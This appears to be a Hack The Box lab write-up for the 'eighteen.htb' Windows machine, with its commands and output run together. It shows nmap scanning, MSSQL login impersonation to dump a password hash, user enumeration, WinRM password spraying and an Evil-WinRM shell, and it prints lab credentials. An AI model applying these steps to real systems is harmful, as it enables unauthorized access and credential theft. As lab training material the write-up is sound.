Enumeration
Given credentials
kevin / iNa2we6haRj2gaw!TCP Port Scanning using NMAP
└──╼ [★]$ nmap -sCV -p- -T4 10.10.11.95Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-19 10:23 CSTNmap scan report for eighteen.htb (10.10.11.95)Host is up (0.0024s latency).Not shown: 65532 filtered tcp ports (no-response)PORT STATE SERVICE VERSION80/tcp open http Microsoft IIS httpd 10.0|_http-server-header: Microsoft-IIS/10.0|_http-title: Welcome - eighteen.htb1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RC0+| ms-sql-info:| 10.10.11.95:1433:| Version:| name: Microsoft SQL Server 2022 RC0+| number: 16.00.1000.00| Product: Microsoft SQL Server 2022| Service pack level: RC0| Post-SP patches applied: true|_ TCP port: 1433| ms-sql-ntlm-info:| 10.10.11.95:1433:| Target_Name: EIGHTEEN| NetBIOS_Domain_Name: EIGHTEEN| NetBIOS_Computer_Name: DC01| DNS_Domain_Name: eighteen.htb| DNS_Computer_Name: DC01.eighteen.htb| DNS_Tree_Name: eighteen.htb|_ Product_Version: 10.0.26100|_ssl-date: 2025-12-19T22:56:04+00:00; +6h30m14s from scanner time.| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback| Not valid before: 2025-12-19T22:48:43|_Not valid after: 2055-12-19T22:48:435985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)|_http-server-header: Microsoft-HTTPAPI/2.0|_http-title: Not FoundService Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:|_clock-skew: mean: 6h30m13s, deviation: 0s, median: 6h30m13sEndpoint Fuzzing Using NMAP
login [Status: 200, Size: 1961, Words: 602, Lines: 66, Duration: 626ms]# license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 2253, Words: 674, Lines: 74, Duration: 649ms]register [Status: 200, Size: 2421, Words: 762, Lines: 76, Duration: 546ms]admin [Status: 302, Size: 199, Words: 18, Lines: 6, Duration: 9ms]# Priority ordered case-sensitive list, where entries were found [Status: 200, Size: 2253, Words: 674, Lines: 74, Duration: 674ms]features [Status: 200, Size: 2822, Words: 849, Lines: 88, Duration: 547ms]logout [Status: 302, Size: 189, Words: 18, Lines: 6, Duration: 5ms]dashboard [Status: 302, Size: 199, Words: 18, Lines: 6, Duration: 9ms]Subdirectory Fuzzing Using NMAP Got nothing.
From nmap result, seems that port 80 IIS, 1433 MSSQL, and 5985 WinRm is opened.
First, doing in port 1433 MSSQL. Tools that used is mssqlclient.py from impacket and netexec.
└──╼ [★]$ mssqlclient.py DOMAIN/kevin:'iNa2we6haRj2gaw!'@10.10.11.95Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192[*] INFO(DC01): Line 1: Changed database context to 'master'.[*] INFO(DC01): Line 1: Changed language setting to us_english.[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)[!] Press help for extra shell commandsSQL (kevin guest@master)> SELECT name FROM master.dbo.sysdatabases;name-----------------master
tempdb
model
msdb
financial_planner
SQL (kevin guest@master)> SELECT name FROM master.sys.syslogins;name------sa
kevin
appdevWe see that there are 2 other users, sa and appdev.
But kevin cant access financial_planner table.
SQL (kevin guest@master)> SELECT name FROM financial_planner.sys.tables;ERROR(DC01): Line 1: The server principal "kevin" is not able to access the database "financial_planner" under the current security context.SQL (kevin guest@master)>Try to using nxc.
└──╼ [★]$ nxc mssql 10.10.11.95 -u kevin -p 'iNa2we6haRj2gaw!' --local-auth MSSQL 10.10.11.95 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb) (EncryptionReq:False)MSSQL 10.10.11.95 1433 DC01 [+] DC01\kevin:iNa2we6haRj2gaw!┌─[sg-vip-2]─[10.10.14.12]─[htb-mp-2897749@htb-kryigcaylc]─[~]└──╼ [★]$ nxc mssql 10.10.11.95 -u kevin -p 'iNa2we6haRj2gaw!' --local-auth -M mssql_privMSSQL 10.10.11.95 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb) (EncryptionReq:False)MSSQL 10.10.11.95 1433 DC01 [+] DC01\kevin:iNa2we6haRj2gaw!MSSQL_PRIV 10.10.11.95 1433 DC01 [*] kevin can impersonate: appdevkevin can impersonate appdev, so i tried to login as appdev.
SQL (kevin guest@master)> execute as login = 'appdev'SQL (appdev appdev@master)>SQL (appdev appdev@master)> SELECT * FROM financial_planner.dbo.users; id full_name username email password_hash is_admin created_at---- --------- -------- ------------------ ------------------------------------------------------------------------------------------------------ -------- ----------1002 admin admin admin@eighteen.htb pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133 1 2025-10-29 05:39:03
SQL (appdev appdev@master)>Crack hashes and get iloveyou1
Trying to get all user.
┌─[sg-vip-2]─[10.10.14.12]─[htb-mp-2897749@htb-kryigcaylc]─[~]└──╼ [★]$ nxc mssql 10.10.11.95 -u kevin -p 'iNa2we6haRj2gaw!' --rid-brute --local-authMSSQL 10.10.11.95 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb) (EncryptionReq:False)MSSQL 10.10.11.95 1433 DC01 [+] DC01\kevin:iNa2we6haRj2gaw!MSSQL 10.10.11.95 1433 DC01 498: EIGHTEEN\Enterprise Read-only Domain ControllersMSSQL 10.10.11.95 1433 DC01 500: EIGHTEEN\AdministratorMSSQL 10.10.11.95 1433 DC01 501: EIGHTEEN\GuestMSSQL 10.10.11.95 1433 DC01 502: EIGHTEEN\krbtgtMSSQL 10.10.11.95 1433 DC01 512: EIGHTEEN\Domain AdminsMSSQL 10.10.11.95 1433 DC01 513: EIGHTEEN\Domain UsersMSSQL 10.10.11.95 1433 DC01 514: EIGHTEEN\Domain GuestsMSSQL 10.10.11.95 1433 DC01 515: EIGHTEEN\Domain ComputersMSSQL 10.10.11.95 1433 DC01 516: EIGHTEEN\Domain ControllersMSSQL 10.10.11.95 1433 DC01 517: EIGHTEEN\Cert PublishersMSSQL 10.10.11.95 1433 DC01 518: EIGHTEEN\Schema AdminsMSSQL 10.10.11.95 1433 DC01 519: EIGHTEEN\Enterprise AdminsMSSQL 10.10.11.95 1433 DC01 520: EIGHTEEN\Group Policy Creator OwnersMSSQL 10.10.11.95 1433 DC01 521: EIGHTEEN\Read-only Domain ControllersMSSQL 10.10.11.95 1433 DC01 522: EIGHTEEN\Cloneable Domain ControllersMSSQL 10.10.11.95 1433 DC01 525: EIGHTEEN\Protected UsersMSSQL 10.10.11.95 1433 DC01 526: EIGHTEEN\Key AdminsMSSQL 10.10.11.95 1433 DC01 527: EIGHTEEN\Enterprise Key AdminsMSSQL 10.10.11.95 1433 DC01 528: EIGHTEEN\Forest Trust AccountsMSSQL 10.10.11.95 1433 DC01 529: EIGHTEEN\External Trust AccountsMSSQL 10.10.11.95 1433 DC01 553: EIGHTEEN\RAS and IAS ServersMSSQL 10.10.11.95 1433 DC01 571: EIGHTEEN\Allowed RODC Password Replication GroupMSSQL 10.10.11.95 1433 DC01 572: EIGHTEEN\Denied RODC Password Replication GroupMSSQL 10.10.11.95 1433 DC01 1000: EIGHTEEN\DC01$MSSQL 10.10.11.95 1433 DC01 1101: EIGHTEEN\DnsAdminsMSSQL 10.10.11.95 1433 DC01 1102: EIGHTEEN\DnsUpdateProxyMSSQL 10.10.11.95 1433 DC01 1601: EIGHTEEN\mssqlsvcMSSQL 10.10.11.95 1433 DC01 1602: EIGHTEEN\SQLServer2005SQLBrowserUser$DC01MSSQL 10.10.11.95 1433 DC01 1603: EIGHTEEN\HRMSSQL 10.10.11.95 1433 DC01 1604: EIGHTEEN\ITMSSQL 10.10.11.95 1433 DC01 1605: EIGHTEEN\FinanceMSSQL 10.10.11.95 1433 DC01 1606: EIGHTEEN\jamie.dunnMSSQL 10.10.11.95 1433 DC01 1607: EIGHTEEN\jane.smithMSSQL 10.10.11.95 1433 DC01 1608: EIGHTEEN\alice.jonesMSSQL 10.10.11.95 1433 DC01 1609: EIGHTEEN\adam.scottMSSQL 10.10.11.95 1433 DC01 1610: EIGHTEEN\bob.brownMSSQL 10.10.11.95 1433 DC01 1611: EIGHTEEN\carol.whiteMSSQL 10.10.11.95 1433 DC01 1612: EIGHTEEN\dave.greenFoothold
Password spraying winrm 5985 using NXC winrm.
└──╼ [★]$ nxc winrm 10.10.11.95 -u users.txt -p 'iloveyou1' --no-bruteforceWINRM 10.10.11.95 5985 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)WINRM 10.10.11.95 5985 DC01 [-] eighteen.htb\DC01:iloveyou1WINRM 10.10.11.95 5985 DC01 [-] eighteen.htb\DnsAdmins:iloveyou1WINRM 10.10.11.95 5985 DC01 [-] eighteen.htb\DnsUpdateProxy:iloveyou1WINRM 10.10.11.95 5985 DC01 [-] eighteen.htb\mssqlvc:iloveyou1WINRM 10.10.11.95 5985 DC01 [-] eighteen.htb\HR:iloveyou1WINRM 10.10.11.95 5985 DC01 [-] eighteen.htb\IT:iloveyou1WINRM 10.10.11.95 5985 DC01 [-] eighteen.htb\Finance:iloveyou1WINRM 10.10.11.95 5985 DC01 [-] eighteen.htb\jamie.dunn:iloveyou1WINRM 10.10.11.95 5985 DC01 [-] eighteen.htb\jane.smith:iloveyou1WINRM 10.10.11.95 5985 DC01 [-] eighteen.htb\alice.jones:iloveyou1WINRM 10.10.11.95 5985 DC01 [+] eighteen.htb\adam.scott:iloveyou1 (Pwn3d!)Got users adam.scott with password iloveyou1
*Evil-WinRM* PS C:\Users\adam.scott\Documents> ls*Evil-WinRM* PS C:\Users\adam.scott\Documents> cd ../Desktop*Evil-WinRM* PS C:\Users\adam.scott\Desktop> ls
Directory: C:\Users\adam.scott\Desktop
Mode LastWriteTime Length Name---- ------------- ------ -----ar--- 12/19/2025 2:47 PM 34 user.txt
*Evil-WinRM* PS C:\Users\adam.scott\Desktop> cat user.txte59878ee5413b2f44be497730c211a17*Evil-WinRM* PS C:\Users\adam.scott\Desktop>Post-Exploitation
winpeas
Privilege Escalation
BadSuccessor